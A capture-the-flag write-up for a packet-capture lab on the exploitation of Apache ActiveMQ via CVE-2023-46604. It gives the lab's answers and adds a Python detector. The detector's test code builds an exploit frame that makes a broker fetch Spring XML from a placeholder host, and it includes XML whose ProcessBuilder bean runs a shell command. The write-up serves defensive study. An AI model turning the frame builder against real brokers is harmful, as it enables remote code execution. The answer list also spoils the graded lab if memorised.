
OpenWire Write-up

Praise be to God, and may peace and blessings be upon the Messenger of God, his family and his companions. To proceed:


Last updated 6 months ago

Scenario:

During your shift as a tier-2 SOC analyst, you receive an escalation from a tier-1 analyst regarding a public-facing server. This server has been flagged for making outbound connections to multiple suspicious IPs. In response, you initiate the standard incident response protocol, which includes isolating the server from the network to prevent potential lateral movement or data exfiltration and obtaining a packet capture from the NSM utility for analysis. Your task is to analyze the pcap and assess for signs of malicious activity.

Tools:

  • Wireshark


Questions:

1. By identifying the C2 IP, we can block traffic to and from this IP, helping to contain the breach and prevent further data exfiltration or command execution. Can you provide the IP of the C2 server that communicated with our server?

Answer: 146.190.21.92

Where to look in Wireshark: Statistics > Conversations (IPv4 tab) lists every host pair in the capture. A public-facing server should be accepting connections, not opening them, so the external addresses that the server itself initiates sessions to are the C2 candidates.


2. Initial entry points are critical to trace back the attack vector. What is the port number of the service the adversary exploited?

Answer: 61616

61616/TCP is the default listener for ActiveMQ's OpenWire transport, so the inbound session to that port is the exploit traffic; the display filter tcp.port == 61616 isolates it, and Follow > TCP Stream shows the raw command that was sent.


3. Following up on the previous question, what is the name of the service found to be vulnerable?

Answer: Apache ActiveMQ

OpenWire, which gives the lab its name, is ActiveMQ's native binary wire protocol; Wireshark ships a dissector for it, so the command type and its fields are visible without decoding the bytes by hand.


4. The attacker's infrastructure often involves multiple components. What is the IP of the second C2 server?

Answer: 128.199.52.72

Block both addresses. A single IP is rarely the whole attacker infrastructure: the host that triggers the vulnerability, the host that serves the follow-on payload and the host that receives the shell need not be the same machine.


5. Attackers usually leave traces on the disk. What is the name of the reverse shell executable dropped on the server?

Answer: docker

The file name mimics a legitimate binary. When hunting for it on the host, match on the hash of the bytes carved from the capture (File > Export Objects, or the raw stream), not on the name.


6. What Java class was invoked by the XML file to run the exploit?

Answer: java.lang.ProcessBuilder

In the public exploitation of this flaw the attacker hosts a Spring XML file that declares a bean of this class; the bean's constructor arguments are the command line the broker ends up executing, so the XML fetched over HTTP in the capture gives the exact command.


7. To better understand the specific security flaw exploited, can you identify the CVE identifier associated with this vulnerability?

Answer: CVE-2023-46604

An OpenWire deserialization flaw in Apache ActiveMQ rated CVSS 10.0, disclosed in late October 2023 and fixed in 5.15.16, 5.16.7, 5.17.6 and 5.18.3. Brokers exposing 61616 to the internet were mass-exploited within days of disclosure, which is exactly the situation in this scenario.


8. What is the vulnerable Java method and class that allows an attacker to run arbitrary code? (Format: Class.Method)

Answer: BaseDataStreamMarshaller.createThrowable

The unmarshaller for an ExceptionResponse command reads a class name and a message string from the wire and passes both to createThrowable, which instantiates the named class by reflection with the message as its constructor argument, without checking that the class is actually a Throwable. Sending org.springframework.context.support.ClassPathXmlApplicationContext as the class and a URL as the message makes the broker fetch and apply the attacker's Spring XML. The fix adds a Throwable.class.isAssignableFrom check before instantiation.
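The following is an added example, not code from the lab, from CyberDefenders or from Apache ActiveMQ. It parses a loose-encoded OpenWire ExceptionResponse (the encoding a broker accepts before wire-format negotiation, and the one the public exploits use), flags the CVE-2023-46604 pattern described in questions 6 to 8, and pulls the command line out of the Spring XML stage from question 6. All sample inputs are constructed in the block; the host 192.0.2.10, the path poc.xml and the command are placeholders, not values from the lab capture.

```python
"""Detect the CVE-2023-46604 OpenWire pattern and inspect the Spring XML stage.
Added example for this write-up; not code from the lab or from ActiveMQ.
Sample inputs below are constructed placeholders."""
import struct
import xml.etree.ElementTree as ET

EXCEPTION_RESPONSE = 0x1F  # OpenWire command type byte of ExceptionResponse

# Only Throwable subclasses belong in an ExceptionResponse; these Spring
# context classes are the ones publicly abused with this flaw.
SUSPECT_CLASSES = {
    "org.springframework.context.support.ClassPathXmlApplicationContext",
    "org.springframework.context.support.FileSystemXmlApplicationContext",
}
SPRING_NS = "{http://www.springframework.org/schema/beans}"


def _utf(s: str) -> bytes:
    """DataOutput.writeUTF layout: 2-byte big-endian length, then the bytes."""
    b = s.encode()
    return struct.pack(">H", len(b)) + b


def build_exception_response(clazz: str, message: str) -> bytes:
    """Loose-encoded ExceptionResponse frame. Exists only to construct samples."""
    body = bytes([EXCEPTION_RESPONSE])
    body += struct.pack(">i", 0)                 # commandId
    body += b"\x00"                              # responseRequired = false
    body += struct.pack(">i", 0)                 # correlationId
    body += b"\x01" + b"\x01" + _utf(clazz)      # throwable present, class present
    body += b"\x01" + _utf(message)              # message present
    return struct.pack(">i", len(body)) + body   # 4-byte size prefix


def parse_exception_response(frame: bytes):
    """Return (class_name, message) for a loose ExceptionResponse, else None.
    Field order mirrors BaseDataStreamMarshaller.looseUnmarsalThrowable."""
    if len(frame) < 5:
        return None
    (size,) = struct.unpack(">i", frame[:4])
    body = frame[4:4 + size]
    if len(body) != size or body[0] != EXCEPTION_RESPONSE:
        return None
    pos = 1 + 4 + 1 + 4          # type, commandId, responseRequired, correlationId
    if pos >= len(body) or body[pos] != 1:   # no throwable attached
        return None
    pos += 1
    fields = []
    for _ in range(2):           # class name, then message: presence flag + UTF
        if pos >= len(body):
            return None
        present, pos = body[pos], pos + 1
        if not present:
            fields.append(None)
            continue
        (n,) = struct.unpack(">H", body[pos:pos + 2])
        pos += 2
        fields.append(body[pos:pos + n].decode("utf-8", errors="replace"))
        pos += n
    return tuple(fields)


def is_cve_2023_46604(frame: bytes) -> bool:
    """Exploit signature: a non-Throwable Spring context class whose 'message'
    is a URL the broker would fetch its bean definitions from."""
    parsed = parse_exception_response(frame)
    if parsed is None:
        return False
    clazz, message = parsed
    return clazz in SUSPECT_CLASSES and (message or "").lower().startswith(("http://", "https://"))


def process_builder_commands(xml_text: str) -> list:
    """Command lines declared by java.lang.ProcessBuilder beans in a Spring XML."""
    root = ET.fromstring(xml_text)
    cmds = []
    for bean in root.iter(SPRING_NS + "bean"):
        if bean.get("class") == "java.lang.ProcessBuilder":
            cmds.append([v.text for v in bean.iter(SPRING_NS + "value")])
    return cmds


# Constructed samples: placeholder host, URL and command, not lab data.
SAMPLE_EXPLOIT = build_exception_response(
    "org.springframework.context.support.ClassPathXmlApplicationContext",
    "http://192.0.2.10/poc.xml")
SAMPLE_BENIGN = build_exception_response(
    "java.lang.SecurityException", "User name [x] or password is invalid.")
SAMPLE_XML = """<beans xmlns="http://www.springframework.org/schema/beans">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list><value>bash</value><value>-c</value><value>id</value></list>
    </constructor-arg>
  </bean>
</beans>"""

if __name__ == "__main__":
    for name, frame in (("exploit", SAMPLE_EXPLOIT), ("benign", SAMPLE_BENIGN)):
        print(name, parse_exception_response(frame), is_cve_2023_46604(frame))
    print(process_builder_commands(SAMPLE_XML))
```

To run it over the lab capture, export the client-to-server bytes of the 61616 stream (Follow > TCP Stream, Raw) and feed them to parse_exception_response; the parser expects the bytes to start at a command boundary and handles only the loose encoding, which is the relevant case since the exploit is sent before the wire format is negotiated. The is_cve_2023_46604 check is deliberately narrow: any class name in an ExceptionResponse that is not a Throwable is worth a look, even when it is not one of the two Spring classes listed.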


After some research, I found this blog that explains the vulnerability very clearly.

Link: https://cyberdefenders.org/blueteam-ctf-challenges/openwire/

Writeup on medium: https://medium.com/@GLITCHGC/openwire-write-up-06ad77c7200e